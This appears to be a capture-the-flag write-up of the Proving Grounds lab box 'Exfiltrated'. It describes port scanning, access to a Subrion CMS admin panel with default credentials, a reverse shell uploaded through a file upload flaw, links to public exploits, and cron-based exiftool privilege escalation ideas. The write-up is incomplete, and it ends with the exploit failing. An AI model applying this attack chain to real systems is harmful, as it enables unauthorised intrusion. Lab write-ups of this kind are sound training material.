Post

Proving Grounds - Exfiltrated

Exfiltrated was a well-structured box that provided an excellent opportunity to exploit a Subrion CMS vulnerability and perform privilege escalation via an Exiftool exploit.

Initial enumeration led to the discovery of Subrion CMS, and default credentials allowed for access to the admin panel.

By exploiting a file upload vulnerability, a reverse shell was obtained. Further enumeration revealed a cron job running Exiftool on uploaded images, which was leveraged to escalate privileges and capture the flag.

Diagram

graph TD
    A[Host Enumeration] -->|Nmap Scan| B[Identify Subrion CMS]
    B -->|Default Credentials| C[Admin Panel Access]
    C -->|File Upload Vulnerability| D[Upload Reverse Shell]
    D -->|Execute Reverse Shell| E[Gain Initial Access]
    E -->|Cron Job Enumeration| F[Identify Exiftool Usage]
    F -->|Exploit Exiftool| G[Privilege Escalation]
    G -->|Capture Flag| H[Success]

Information Gathering

Portscan


  • nmap -sS -Pn -n -T4 --open 192.168.177.163

    Untitled

  • nmap -sS -Pn -n -T4 --open 192.168.177.163 -p-

    Untitled

  • nmap -sVC -Pn -n -p 22,80 192.168.177.163

    Untitled

Enumeration

HTTP 80


Once authenticated i tried this exploit

  • https://github.com/hev0x/CVE-2018-19422-SubrionCMS-RCE

After read the exploit i decided to put an reverse shell inside the http://exfiltrated.offsec/panel/uploads/

Priv Escalation


  • cat /etc/cron*

    Untitled

  • cat /opt/image-exif.sh

    Untitled

  • ls -lh /opt/image-exif.sh

    Untitled

  • ls -ld /var/www/html/subrion/uploads /opt/metadata

    Untitled

Since the cron script writes EXIF metadata to a log file in /opt/metadata using the exiftool command, one possible attack vector is to exploit a symlink attack if the script does not properly handle symbolic links.

  • exiftool -ver

    Untitled

  • searchsploit exiftool

    Untitled

Searching more i found this repository

https://github.com/mr-tuhin/CVE-2021-22204-exiftool.git

But wasn’t working because of the bbz

This post is licensed under CC BY 4.0 by the author.